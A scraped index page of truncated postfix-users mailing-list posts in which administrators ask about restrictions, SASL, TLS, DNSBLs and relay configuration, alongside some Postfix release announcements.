Need Help Configuring Postfix Restrictions

Hi i have installed postfix 2.11.3 on debian jessie.Everthing works fine. I would like to restrict local users to send mails to a particular group email id and allow only few users with smtpd_restriction_classes , smtpd_recipient_restrictions following this link <a href="" title=""></a> which is not working. All the users are still able to send mails to the group id. I have the same restriction working fine with postfix 2.9 installed on wheezy.

fatal: no SASL authentication mechanisms please help!

Trying to setup sasl, postfix 2.7, dovecot 1.29. The following is in mail.log
fatal: no SASL authentication mechanisms
warning: deliver_request_get: error receiving common attributes
warning: unexpected end-of-input from dovecot socket while reading input attribute name
warning: process /usr/lib/postfix/smtpd pid 20380 exit status 1
myorigin = /etc/mailname
queue_directory = /var/spool/postfix/

biff = no

# appending .domain is the MUA's job.
append_dot_mydomain = no

# Uncomment the next line to generate "delayed mail" warnings
#delay_warning_time = 4h

submission rate limit advice

I've tightened or rather overtightened several postfix limits, in what
seemed like a good idea at the time...

noticed now this warning, this user is on a dynamic IP, so can't add his
IP to exception:

going by the counter "Connection rate limit exceeded: 125", what values
should I alter?

Jan 31 14:01:09 geko postfix/smtpd[24223]: warning: Connection rate limit
exceeded: 124 from[] for
service submission
Jan 31 14:03:14 geko postfix/smtpd[24340]: warning: Connection rate limit
exceeded: 125 from[

How to autoreply with "Undelivered Mail Returned to Sender" unknown user for


Let's say that I do have a user "user" on my system, but I would like
for emails sent to "user+ ... at domain dot org" to bounce back the
"Undelivered mail" message with something like:

<user+ ... at domain dot org>: unknown user: "user+doesnotexist"

How would I do this? I naively tried adding

user+doesnotexist: doesnoteixst

to my /etc/aliases file, but it was still delivered to my user account.

Thanks for any help.


Disable SSL/TLS renegotiation

Hello postfix-users,

While checking the SSL configuration of a Postfix server, I noticed that
so-called "Client-initiated secure renegotiation" is available at
Postfix by default.
You can verify it with following openssl command and press "R" once the
connection is successfully established:

openssl s_client -connect <hostname/IP>:25 -starttls smtp

250 DSN
depth=2 C = US, O = XXX, OU = <a href="" title=""></a>, CN = XXX Root CA
verify return:1
depth=1 C = US, O = XXX, OU = <a href="" title=""></a>, CN = XXX Server CA
verify return:1
depth=0 C = XX, ST = XXX, L = XXX, O = XX, CN = XXX
verify return:

check_client_access not blocking /8 /16 /24 etc.

I'm curious to know what I've done wrong with my client checks file.

I can reject a specific IP but it won't reject when I use net blocks...

STARTTLS / DANE difficulties?

We are migrating our Postfix MX services and in the process have
disrupted a setup which has been very stable for the past couple of

Trouble Postfix ClamSMTP - Help


Please now i troubleshooting 2 days about my problem with ClamSmtp

and "Postfix" after write ClamAV_Mailinglist the people there are not

helping and im standing still.

Setting per user/domain smtpd_recipient_limit

Is it possible to set smtpd_recipient_limit via maps?

We have multiple domains and the need to remove such a limitation on a domain or user basis.


Making relay_access_denied permanent?


I was wondering why the following error is returned as tempfail:

Jul  8 09:49:03 mx3 postfix-cluster/smtpd[3420]: connect from[]
Jul  8 09:49:03 mx3 postfix-cluster/smtpd[3420]: NOQUEUE: reject: RCPT
from[]: 454 4.7.1
< ... at gmail dot com>: Relay access denied;
from=< ... at jpkessler dot de> to=< ... at gmail dot com> proto=ESMTP
Jul  8 09:49:03 mx3 postfix-cluster/smtpd[3420]: lost connection after
RCPT from[

FreeBSD-11 (Jail) Saslauthd rimap authentication fails

I seem to have a configuration issue with respect to sender
authentication. On the Postfix-3.3.0 host I can do this:

[root@mx32 ~]# testsaslauthd -u testuser -p testuser-password #
expires 20180703
0: OK "Success."

However, when I try to send an email through this Postfix service from
a remote Squirrelmail instance using that same username and password
it fails saslauth in postfix:

[root@mx32 ~]# grep 'Jul 3 12:57:' /var/log/maillog
. .

Long-running cron job emails appearing in queue with large delay value


When a long-running (24hr) cron job runs with log output sent to STDOUT,
it's emailed in the standard way but the resulting email appears in the
queue with a delay value of ~86000 seconds. Our monitoring system,
depending on timing, occasionally spots these and raises an alert about
a potential delivery issue.

Is there any way of tweaking postfix so that it starts the clock only
once the sendmail/postdrop process has received the entire mail from the
cron job?


Server side S/MIME EFail (partial) Mitigation


I read carefully the technical paper about the exfiltration attack (efail) on decrypted S/MIME or PGP content.

<a href="" title=""></a> <>
<a href="" title=""></a> <>

According to my understanding, sanitizing text/html content to a certain extend in the mail body should mitigate the attack.

smtp_address_preference default


according to [1] since 2.8 postfix uses ipv6 as default for
smtp_address_preference. But as stated in the doc, it is unsafe as only
IPv6 connectivity is broken, so the safe variant would be any.

Wouldn't it be an alternative that smtp_address_preference could be set
to "ipv6, ipv4" or "ipv4, ipv6" instead of any?

Kind regards


may not be appropriate question but figured what the hay... -- Dovecot

Hi, based on commands below, anyone know why i would get these errors ?

Jun 29 12:05:02 mail2 dovecot: imap-login: Login: user=<cec-support-comment>, method=PLAIN, rip=, lip=, mpid=6752, TLS
Jun 29 12:05:02 mail2 dovecot: imap(cec-support-comment): Error: user cec-support-comment: Initialization failed: Initializing mail storage from mail_location setting failed: mkdir(/home/cec_support_comment/mail) failed: Permission denied (euid=593(cec-support-comment) egid=594(cec-support-comment) missing +w perm: /home, euid is not dir owner)

Back story, user wanted names to h

RE: Can postfix send encrypted but not authenticated emails ? -- FIXED

Hi, I only needed to add one setting and all the deferred test emails on O365 started flowing into my inbox

RAN vi /etc/postfix/
# -ALF 2018-06-28
smtpd_tls_security_level = may
RAN service postfix reload

Case closed, thanks.


ITS Service Manager:
Spam and Virus Prevention
Mass Mailing
G Suite/Gmail

<a href="mailto: ... at uconn dot edu"> ... at uconn dot edu</a>
University of Connecticut,  ITS, SSG, Server Systems

Reject unknown users, even when sent from 'mydomain'

I have a LAN behind a firewall with port 25 forwarded to machine running
postfix. That machine sends email on to
a Domino server. However, I am using a VM for testing and I cannot change
the forwarded port. So I am doing it
all from the postfix machine. I use the command below to send an email to
an unknown user (from command line).
But it delivers it to Domino anyway. I have only one user defined in
/etc/postfix/aliases file. Do I have the right
configuration to reject unknown users?

Defer mail instead of bounce

I have email relays that relay/filter email between the internet and our
internal network. I must use the DNS servers we maintain and those
servers use a DNS blacklisting service. The problem I'm having is that
when a legitimate domain is blacklisted, I see log messages like the
ones below and the email is bounced. In the situation that brought this
up, both the sender and recipient domain were blocked so the bounce went
nowhere. Since these blacklistings are temporary, maybe several hours,
I'd like to defer this mail and have postfix try again later.

Can postfix send encrypted but not authenticated emails ?

Hi, I have been reading the online docs for TLS_README.html and SASL_README.html but still having trouble deducing if I can get Postfix 2.6 to accept email over port 587 without giving Postfix a username and password ?

My current understanding of how my server deals with mail is traffic on port 25 with no username and password needed is only allowed from on-campus, and traffic on ports 465 and 587 is allowed when you provide a username and password, and postfix encrypts the email.

I would like to change it so postfix will accept email without a username and password, specifically from Offic

Can a ISP block partially the traffic over the port 25 ??


I'm have a very strange issue with a mail server, locate in the main
company office. Until the last five weeks we are experimenting
problems to deliver emails to some domains stored on and
other servers.

how to restrict subnets to send only to specific domains


i have to setup Postfix that clients or printers from subnets like or specific ip addresses like are allowed to
send mails to every destination.

I have done this by this

smtpd_relay_restrictions = permit_mynetworks, permit_sasl_authenticated,
mynetworks = [::ffff:]/104 [::1]/128

In the txt file are the specific mail addresses.

Now i have to restrict some subnets to send mails only to domains like or

I found


Hi all,

I was reading Postfix documentation and found this configuration parameter.

disable_vrfy_command (default: no)
Disable the SMTP VRFY command. This stops some techniques used to harvest email addresses.

I am not a native English speaker so a bit confused with the sentence above. So, if the value is set to 'no', it stops some techniques used to harvest email addresses. Is it correct? The parameter itself has disable in its name so it look like a double negative.

Sorry for this silly question but I would really appreciate it if anyone could help me.

error when atempting to send a message


I'm running Postfix 3.3.1 with rspamd as an antti-spam solution.

Header has unknown for IP address


I don’t believe my Postfix install is doing the PTR lookups, or it broke in some way.

I have this enabled:
# postconf |grep smtpd_peername_lookup
smtpd_peername_lookup = yes

and my DNS can resolve the name:
# host domain name pointer

But the headers give unknown:
Received: from (unknown [])
by (Postfix) with ESMTPS id BA9143C
for < ... at example dot com>; Wed, 27 Jun 2018 15:48:44 +0000 (UTC)

How could I debug/enable this? What was missed in the config.

Many thanks, S.

Need to understand mynetworks_style more

In our live system, I have firewall forwarding port 25 to mail server.
That mail server then delivers mail to Domino server.

I am testing on a VM, and I have this much configured and working within
our LAN.

I am unclear as to delivery restrictions. The default for
mynetworks_style is subnet, so email will be accepted from any machine on
Does this restrict email coming in from internet? Since I can't test with
live system, I can't forward port 25 to VM for testing.

My goal:
I am migrating from Sendmail.

What is postfix telling me to do?

I am configuring a new Postfix-3.3.0 service to act as one of our
public MX providers. The address of this new MX service has been
published in our DNS but with a lower precedence (higher priority
number) than our active MX service.

Naturally enough there are countless spam bots regularly hitting the
low priority MX services and so when I activate Postfix for testing we
get numerous opportunistic connections.

New EFF certbot plugin for Postfix

The EFF announced a certbot plugin for Postfix today, which
is still in beta. A couple of things to keep in mind:

* If you've already deployed DANE, this stands a good chance
of breaking your DANE TLSA records. For the moment do not
deploy this if have inbound DANE.

* Do consider sharing any substantive experience (issues you
had to resolve that may say others grief).

unable to get smtpd_recipient_restrictions to work

I have setup postfix using virtualmin on ubuntu 16.04
Have setup DKIM, MX, SPF etc
For webmail have setup roundcube and rainloop.
SSL is setup using let's encrypt.
Everything works great for emails.

Now we need to restrict some users to be able to send local emails only.
For this I found this <a href="" title=""></a>
and followed steps for Restricting what users can send mail to off-site

I have tried all options and searched all options online but none of it
seems to work for this.

Here's content from my file


Blocking TLDs with check_sender_access


I have a check_sender_access restriction that blocks many TLDs like
.red and .space. Problem is that we have one legitimate .red customer
(what was he thinking?) that needs to send us mail.

performance question


for a period of time we need to route ~ 2.000 mail addresses to our old
I would add those addresses into the transport file like

<a href="mailto: ... at domain dot com"> ... at domain dot com</a>
<a href="mailto: ... at domain dot com"> ... at domain dot com</a>

Will the larger transport file now affect the performance of the Postfix
server ?

Best place for DNSBL restrictions


I manage a small mail server and have been using Spamcop as a DNSBL’s via postscreen:

postscreen_dnsbl_sites =
postscreen_dnsbl_action = drop

After reading RFC 5782 “DNS Blacklists and Whitelists”, I decided to add some more
DNSBL’s and specify filters and weighting. While looking at various samples of
using DNSBL’s, I came back to an old question - where should I implement DNSBL restrictions ?

On this list I seem to recall that using a DNSBL via postscreen is discouraged.

postfix, header rewriting, DKIM


upon receiving an email with:

< ... at example dot int>

- notice the missing space after the comma - sendmail passes the
unmodified header to milters, e.g.

Specific recipient restrictions

Hi list,

I have a few users which use a metered mobile connection and I need them to
have restriction in monthly volume used and in each msg size different
than my normal
recipients. eg Normal users can send or receive up to 10MB message but for
them I need
to have a much lower restriction. Is it possible to achieve this through
some add on ?

I would appreciate any direction to look at.

thanks in advance


comma in Display Name


We have a voicemail system that emails the voice messages to the
users. It uses the Caller ID info in the Display Name area of the

A problem occurs when the Caller ID contains a comma which causes the
recipients email server to see the post with multiple from addresses
and some servers (Google's for one) bounce such posts.

Instead of a header such as that we now recieve:

I've requested the phone techs double quote the Display Name area, ie:

How to pass connection's real IP through Nginx smtp proxy to Postfix/postscreen backend?

I run Postfix 3.3.1 & Nginx 1.15.0

Both work great.

I'm beginning to experiment with putting Postfix (and eventually other) server behind Nginx (v 1.15.0) setup as a mail (SMTP) proxy.

Without the proxy, Postfix logs show an inbound connection to my real IP

Jun 21 12:12:31 mailprox postfix/postscreen[55634]: CONNECT from []:43757 to []:25

The way nginx gets configured for smtp proxy, even if I'm *NOT* doing any auth is to direct the connection to a "fake" auth_http destination,

mail {
http {

5 messages per second


I would like to send 5 messages per second with postfix.

How can I do that with postfix ?



Multiple Virtual Domains


I have a new domain on my server and I want certain accounts to
be sent out with the new domain, rather than the default. I have it
set up at the moment so that any domain that you try to send though
get rewritten to the default, But I'd like this new
domain to be allowed through.

I'm sure this has been asked a few times. It just seems this mailing
list in not well listed by search engines any longer.


postfix-3.4-20180619 updated connection reuse

postfix-3.4-20180619 fixes today's segfault in the connection reuse
logic. I have been unable to reproduce the problem on my own systems
so I'll depend on other people for confirmation.


Redirect all email to an external address


I'm trying to create postfix master process listening on port 2525 and
redirect all email send trough this port to an external address.

I create regexp table "/etc/postfix/canonical-redirect-test" to map any
address to the external address I want, test query with postmap return
the expected address.

/^.+@.+$/     <a href="mailto: ... at example dot com"> ... at example dot com</a>

I add new process in /etc/postfix/

:2525 inet n     -       n       -       -   smtpd
    -o canonical_maps=regexp:/etc/postfix/canonical-redirect-test
    -o virtual_alias_maps=regexp:/etc/postfix/canonical-redirect-test

I also try other setti

available: multiple deliveries per TLS-encrypted connection

Postfix snapshot 20180617, released a few minutes ago, introduces
Postfix SMTP client support for multiple deliveries per TLS-encrypted
connection. This is not to be confused with closing a connection
and reusing some TLS state in a new connection.

Below is a fragment from the RELEASE_NOTES file.


Major changes with snapshot 20180617

Preliminary Postfix SMTP client support for multiple deliveries per
TLS-encrypted connection.

Feedback on Tutorial

Hello Postfix users,

I made a relatively comprehensive tutorial[1] on how to set up a mail server
(Postfix, Dovecot, Rspamd,..) and integrate it with Nextcloud. My goal was to
create a all-in-one, step-by-step tutorial from beginning to end.

I partly used other tutorials as a basis, but also did a lot of research and

Postfix-3.3.0_1 Can't assign requested address

I am setting up a new mail hub in a FreeBSD-11.1 jail.

Update to recommended TLS settings

In 2015, Viktor wrote an email detailing the current recommended TLS

Now that we are three years later, are these still the best settings? Is
there something better we can be recommending?

If anything, I think that 'smtp_tls_security_level = may' should be
recommended (it actually should be *default*), but I'm wondering about
the other recommended ciphers/protocols/excludes etc. as well.


masquerade_domains map?

Hello Postfix users,

while "masquerade_exceptions" supports "type:table" patterns,
"masquerade_domains" supports only a static list of domain names in

<a href="" title=""></a>

For me, it could be useful to manage also these domains in a file,
mysql, tcp or ldap... It should be nice if a future release of Postfix
could support "type:table" on "masquerade_domains".

Thank you very much

spamming mailbox ?

I check the mail queue and the logs and this time I found some strange
thing. I used command "grep -r "" /var/log/mail.log" and
result is in attached .txt file. If I understand properly there is many
tries to send from <a href="mailto: ... at s1 dot"> ... at s1 dot</a> to
<a href="mailto: ... at emailemailemail dot com"> ... at emailemailemail dot com</a> but nothing happens
later because of failing connection to on port 25.

policy daemon protocol quoted sender localpart


I'm implementing a policy daemon and I realized
the sender attribute value of the Postfix
policy delegation protocol does not preserve the
quotes of the original envelope address.
If Postfix accepts a mail address I think it
should pass this address to the policy daemon without
modifying it.


To make sure I accept only mail addresses which
can be handled later on by my tools I would
like to do my own check if the address is valid.

Example (Postfix 3.2.4):

Sender address
"AAA ... at AAA dot AAA"@AAA.AAA
is passed by postfix to the policy daemon as:
sender=AAA ... at AAA dot ... at AAA dot AAA

3.4-20180605-nonprod tlsproxy permissions

Using postfix 3.4-20180605-nonprod as a gateway to an internal
server, with a tls policy of "secure".

3.4-20180605-nonprod has been running *without* connection reuse for
a couple days error-free.

When I set smtp_tls_connection_reuse=yes, I get:

Jun 13 10:53:29 mgate3 postfix/tlsproxy[93495]: warning: cannot get
RSA certificate from file "/var/certs/cert-20180314.pem": disabling
TLS support
Jun 13 10:53:29 mgate3 postfix/tlsproxy[93495]: warning: TLS library
problem: error:0200100D:system library:fopen:Permission
Jun 13 10:53:

exclude specific external IP from postfix blacklists

I have a problem with specific IP People from network behind
this address can't connect to mailserver, because - as I found out - this
ip address is listed. Not exactly this specific address but whole C class.
I saw Postfix uses blacklists in own configuration but I would like to
exclude only this one IP.

Guidelines for headers in original message


What are the general guidelines for headers and their values that are shown
in the original message of an email? I'm particularly interested in the
'Received from: foo by bar'. Do people generally append the actual
servernames along with their IP addresses for all the hops? Or, do they
make the mails come out from a common relay server.

Also, if it's fine to make mails come from a common relay, is it a bad idea
to set $myhostname to foo.relay for all the mails from foo domain, instead
of showing all the hops? I've seen people put this as $myorigin.

gmail blocking 6to4 ipv6 addresses

Does gmail universally block 6to4 addresses, or is there something else I
am doing wrong?

Jun 07 23:32:14 <a href="" title=""></a> postfix/smtp[19358]: 0695A2409C: to=<
... at gmail dot com>, orig_to=< ... at git dot icu>, relay=[2607:f8b0:400d:c08::1b]:25, delay=1.6,
delays=0.12/0.07/0.84/0.56, dsn=5.7.1, status=bounced (host[2607:f8b0:400d:c08::1b] said: 550-5.7.1
[2002:c62e:c6c6::1] Our system has detected that this message does not
550-5.7.1 meet IPv6 sending guidelines regarding PTR records and
authentication 550-5.7.1 .

sender_bcc_maps which use reply_to header ?

Hi !

I have a case I want to solve : a mail is sent from <a href="mailto: ... at example dot com"> ... at example dot com</a> with
reply_to defined to <a href="mailto: ... at example dot com"> ... at example dot com</a>.
I want to automaticaly BCC to <a href="mailto: ... at example dot com"> ... at example dot com</a> if reply_to is defined to
<a href="mailto: ... at example dot com"> ... at example dot com</a>.

sender_bcc_maps use "from" header, I want same with reply_to header.
It seems this doesn't exist.

What's the best solution to achieve this ?
Content filter ?


local mail submission sendmail fails when loopback is down

Hello all,

TL;DR: `sendmail <address>` fails with `sendmail: fatal: could not find
any active network interfaces` if loopback interface is not up. Is this
expected behaviour?


I know applications can expect the loopback interface to be available.
However, strictly speaking, sendmail when invoked for local mail
submission shouldn't attempt to access the network, all it has to do is
drop the file into the maildrop directory.

reject_sender_login_mismatch exception


I have all users in an LDAP database and store users' aliases, virtuals,
canonicals, forwards etc as attributes. For that purpose using the
`reject_sender_login_mismatch' seems to be a simple and powerful
solution for increasing security and I'm using it. Excluding some e-mail
addresses from this restriction if necessary is not a problem. The
problem is:
I'd like to allow sending mail from some certain hosts as some certain
users without SASL authentication.

Valid examples for mynetworks file

Good day,

i am working on a migration from an IBM Domino SMTP server to Postfix. In
Domino we had SMTP_allow documents with IP addresses of systems allowed for
sending mails via this server.

Standard IP addresses are fine so i add them like: OK

As far as i understand are *names *like allowed in the
mynetworks file ?
So this would be OK : OK

What about wildcards * ? Would that be also OK or do i need to translate it
into CIDR ?

192.168.*.* OK
192.168.50.* OK

Thank you,

not adding message-id


I have a issue with a message-id automatically added when not present.

Postfix mail system:
postfix 25 (content-filter) --> AV 10026 --> postfix 10025

Summary of the problem:
When a message arrives to the postfix mail system, if it not present, a message-id is added by the second postfix MTA (10025) while "always_add_missing_headers" is set to "no".
Note that this second MTA listens to the loopback interface (see below).

Jun 5 16:51:37 rhel62-agu-fe1 postfix/smtpd[3063]: C51FD40092: client=unknown[]
Jun 5 16:51:46 rhel62-agu-fe1 postfix/cleanup[3067]: C51F


I am trying to track a single email throughout the entire postfix process.
The idea is that when a customer calls us and says that a certain email
never reached them, we can quickly trace the email through the logs and see
that it died due to RBL, virus threshold, etc.

Ideally, I'd like to be able to get or set a unique message ID and then be
able to match that ID in the logfiles to see what the outcome of a specific
email was. Is there a way to trace a single email through everything
postfix does to it?


Question regardin postfix. postfwd and spam


I would like to have some help regarding this issue/scenario:

We have a "central" smtp-relay for (almost) all our servers.

progress with TLS connection reuse

Postfix TLS connection reuse will improve delivery performance,
especially for sites that punish clients that send one message per
connection. This feature is evolving in a 'non-production' Postfix
release, currently postfix-3.4-20180603-nonprod.

Instead of changing how Postfix schedules deliveries, this builds
on the Postfix connection caching infrastructure that already exists
for plaintext connections.

Emails from localhost


I'm seeing lot of emails coming from local IP address trying to send
message to non existing accounts. Sending accounts are valid and even
authenticated. They all try to send messages to domain matching the
sending one. For example:

<a href="mailto: ... at example dot org"> ... at example dot org</a> -> <a href="mailto: ... at example dot org"> ... at example dot org</a>
<a href="mailto: ... at example dot net"> ... at example dot net</a> -> <a href="mailto: ... at example dot net"> ... at example dot net</a>

and so on. support@* is valid, user@* is not. In logs they are coming
from inet_interfaces address set in

possiblities to release a mail

Hello Together

I ask me if are possible to view on console with postfix command witch
mail's are holding back, Status mailtraffic, and so on not mail.log about
different reasons - blacklisted, spam, or score - and to release this mail
for resend a blacklisted mail.

In the meantime I do this steps with ASSP but I see postfix are so stable I
don't think that no possibilities will exist. And I don't will play with 2
or 3 tools if this possibilities with Postfix exist.

Please kindly let my view and understand the aspect from us thanx for
discuss this possible aspect.



Syndicate content